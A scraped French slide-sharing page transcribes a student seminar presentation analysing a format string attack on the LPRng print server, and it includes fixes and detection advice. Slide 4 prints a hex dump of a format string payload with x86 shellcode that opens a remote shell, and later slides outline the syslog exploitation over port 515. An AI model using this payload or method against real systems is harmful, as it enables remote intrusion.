>16);lo=(bigvalue&0xffff)+0x10000-hi; sprintf(buf, "%%dd%1$hn%%dd%2$hn", hi, lo); Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn" Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn""> >16);lo=(bigvalue&0xffff)+0x10000-hi; sprintf(buf, "%%dd%1$hn%%dd%2$hn", hi, lo); Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn" Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn"">

La présentation est en train de télécharger. S'il vous plaît, attendez

La présentation est en train de télécharger. S'il vous plaît, attendez

Analyse d’une attaque contre le systeme LPRng (groupe 7) - La vulnerabilite des format strings - Qu’est ce qu’une attaque de format strings? - Comment.

Publié parJessamond Janvier Modifié depuis plus de 9 années

Présentations similaires

Présentation au sujet: "Analyse d’une attaque contre le systeme LPRng (groupe 7) - La vulnerabilite des format strings - Qu’est ce qu’une attaque de format strings? - Comment."— Transcription de la présentation:

1 Analyse d’une attaque contre le systeme LPRng (groupe 7) - La vulnerabilite des format strings - Qu’est ce qu’une attaque de format strings? - Comment proviter de cette vulnerabilite pour ecrire des valeurs - Exemple d’application de l’attaque pour un programme simple - Une vulnerabilite dans LPRng - Le protocole LPD - Un bug de format de string dans une fonction de logging - L’attaque contre LPRng - Les solutions

2 La vulnerabilite des format strings Qu’est ce qu’une vulnerabilite de format string? Qu’est ce qu’une vulnerabilite de format string? Exemple: Exemple: void main() { char buf[512]; memset(buf, 0, sizeof(buf)); read(0, buf, sizeof(buf)); printf(buf);} A premiere vue pas de buffer overflow A premiere vue pas de buffer overflow Possibilite de lire des valeurs sur le stack, par exemple quand buf= “%x”. Possibilite de lire des valeurs sur le stack, par exemple quand buf= “%x”.

3 La vulnerabilite des format strings Comment ecrire des valeurs? Comment ecrire des valeurs? Utiliser la commande ‘%n’ de printf Utiliser la commande ‘%n’ de printf Exemple: Exemple: snprintf(buf, 4, "%100d%n", 0, &i) Comment faire pour ecrire des grandes valeurs a n’importe quel endroit? Comment faire pour ecrire des grandes valeurs a n’importe quel endroit? Utiliser %123$hn Utiliser %123$hn Exemple: Exemple:hi=(bigvalue>>16);lo=(bigvalue&0xffff)+0x10000-hi; sprintf(buf, "%%dd%1$hn%%dd%2$hn", hi, lo); Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn" Si hi=3000 et lo=6000, genere le format string: "%3000d%1$hn%6000d%2$hn"

4 La vulnerabilite des format strings Exemple d’attaque Exemple d’attaque Programme cible: Programme cible: void main() { char buf[512]; memset(buf, 0, sizeof(buf)); read(0, buf, sizeof(buf)); printf(buf);} Format string utilise pour lancer un remote shell a partir de ce programme: Format string utilise pour lancer un remote shell a partir de ce programme: 00000000 E2 F9 FF BF E0 F9 FF BF 25 34 39 31 34 33 64 25........%49143d% 00000010 31 24 68 6E 25 37 39 38 36 35 64 25 32 24 68 6E1$hn%79865d%2$hn 00000020 EB 3B 5E 29 C0 89 46 10 40 89 C3 89 46 0C 40 89.;^)..F.@...F.@. 00000030 46 08 8D 4E 08 B0 66 CD 80 43 C6 46 10 10 66 89F..N..f..C.F..f. 00000040 5E 14 88 46 08 29 C0 89 C2 89 46 18 B0 90 66 89^..F.)....F...f. 00000050 46 16 8D 4E 14 89 4E 0C 8D 4E 08 EB 02 EB 3A B0F..N..N..N....:. 00000060 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C 89f...^.CC.f...V.. 00000070 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 B0V..fC.....?).... 00000080 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C 87?A...?A...V..v.. 00000090 F3 8D 4B 0C B0 0B CD 80 90 E8 84 FF FF FF 2F 62..K.........../b 000000A0 69 6E 2F 73 68in/sh

5 Une vulnerabilite dans LPRng Le protocole LPD: Le protocole LPD: - une connection TCP sur le port 515 par commande - le premier byte du message envoye identifie la commande que l’on veut envoyer - voir RFC1179 pour details

6 Une vulnerabilite dans LPRng Un bug de format string dans une fonction de logging: Un bug de format string dans une fonction de logging: Quand un message recu ne correspond pas a une requete valide, le contenu du message est envoye a syslogd par l’appel suivant: Quand un message recu ne correspond pas a une requete valide, le contenu du message est envoye a syslogd par l’appel suivant: (void) syslog(SYSLOG_FACILITY | kind, msg); Le deuxieme argument de syslog correspond a un format string, comme le premier argument de printf, d’ou la vulnerabilite. Le deuxieme argument de syslog correspond a un format string, comme le premier argument de printf, d’ou la vulnerabilite.

7 L’attaque contre LPRng Envoyer dans un message au serveur lpd une requete intentionnellement invalide Envoyer dans un message au serveur lpd une requete intentionnellement invalide => le contenu du message sera envoye par syslog en position de format string => le contenu du message sera envoye par syslog en position de format string Inserer dans le message un format string malicieux Inserer dans le message un format string malicieux Effectuer une recherche brute force pour deviner la position dans le stack du buffer dans lequel sera stocke le message Effectuer une recherche brute force pour deviner la position dans le stack du buffer dans lequel sera stocke le message L’attaque a ete testee avec succes sur plusieurs systemes Redhat7.0 mis a disposition des etudiants pour le seminaire. L’attaque a ete testee avec succes sur plusieurs systemes Redhat7.0 mis a disposition des etudiants pour le seminaire.

8 Les solutions Ne jamais utliser comme format string une chaine de caracteres pouvant provenir de l’utilisateur Ne jamais utliser comme format string une chaine de caracteres pouvant provenir de l’utilisateur Remplacer Remplacer (void) syslog(SYSLOG_FACILITY | kind, msg); Par (void) syslog(SYSLOG_FACILITY | kind, "%s", msg); Utiliser des versions de LPRng > 3.5.24 Utiliser des versions de LPRng > 3.5.24 Detection d’intrusion en examinant le contenu des paquets envoyes au port 515 Detection d’intrusion en examinant le contenu des paquets envoyes au port 515

Télécharger ppt "Analyse d’une attaque contre le systeme LPRng (groupe 7) - La vulnerabilite des format strings - Qu’est ce qu’une attaque de format strings? - Comment."

Présentations similaires

Mais vous comprenez qu’il s’agit d’une « tromperie ».

Mais vous comprenez qu’il s’agit d’une « tromperie ».
ORTHOGRAM PM 3 ou 4 Ecrire: « a » ou « à » Référentiel page 6

ORTHOGRAM PM 3 ou 4 Ecrire: « a » ou « à » Référentiel page 6
LES NOMBRES PREMIERS ET COMPOSÉS

LES NOMBRES PREMIERS ET COMPOSÉS
Reporting de la Cellule Nationale Droit dOption Situation au 31 décembre 2011.

Reporting de la Cellule Nationale Droit dOption Situation au 31 décembre 2011.
[number 1-100].

[number 1-100].
Présentation de la circonscription Année 2011/2012 Jeudi 24 novembre 2011.

Présentation de la circonscription Année 2011/2012 Jeudi 24 novembre 2011.
Additions soustractions

Additions soustractions
Distance inter-locuteur

Distance inter-locuteur
1 Plus loin dans lutilisation de Windows Vista ©Yves Roger Cornil - 2 août 2007 www.cornil.com.

1 Plus loin dans lutilisation de Windows Vista ©Yves Roger Cornil - 2 août
Le château Clique le plus rapidement possible sur le numéro de la chambre du trésor : 6 ? 27 35 16 5 10 7.

Le château Clique le plus rapidement possible sur le numéro de la chambre du trésor : 6 ?
7 juin 2012 DGAL.

7 juin 2012 DGAL.
Les numéros 70 – 1 000 000 000 000 70 80 90 100 200 300 400 500 600 700 800 900 1000 5000 1000000 1000000000 1000000000000.

Les numéros 70 –
Les numéros 30 60 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60.

Les numéros
Les identités remarquables

Les identités remarquables
Le, la, les words Possessive Adjectives MINE!!. 2 My in french is mon, ma,mes... Le word/ begins with a vowel: Mon La word: Ma Les word: Mes.

Le, la, les words Possessive Adjectives MINE!!. 2 My in french is mon, ma,mes... Le word/ begins with a vowel: Mon La word: Ma Les word: Mes.
Algorithme et structure de données

Algorithme et structure de données
LES TRIANGLES 1. Définitions 2. Constructions 3. Propriétés.

LES TRIANGLES 1. Définitions 2. Constructions 3. Propriétés.
Données statistiques sur le droit doption au 31/01 8 février 2012.

Données statistiques sur le droit doption au 31/01 8 février 2012.
Correspondances en Onco-Urologie - Vol. III - n° 3 – juillet-août-septembre 2012 www.nejm.org VESSIE Daprès James ND et al., N Engl J Med 2012;366:16:1477-88.

Correspondances en Onco-Urologie - Vol. III - n° 3 – juillet-août-septembre VESSIE Daprès James ND et al., N Engl J Med 2012;366:16:
Technologies et pédagogie actives en FGA. Plan de latelier 1.Introduction 2.Les technologies en éducation 3.iPads 4.TNI 5.Ordinateurs portables 6.Téléphones.

Technologies et pédagogie actives en FGA. Plan de latelier 1.Introduction 2.Les technologies en éducation 3.iPads 4.TNI 5.Ordinateurs portables 6.Téléphones.

Présentations similaires

Annonces Google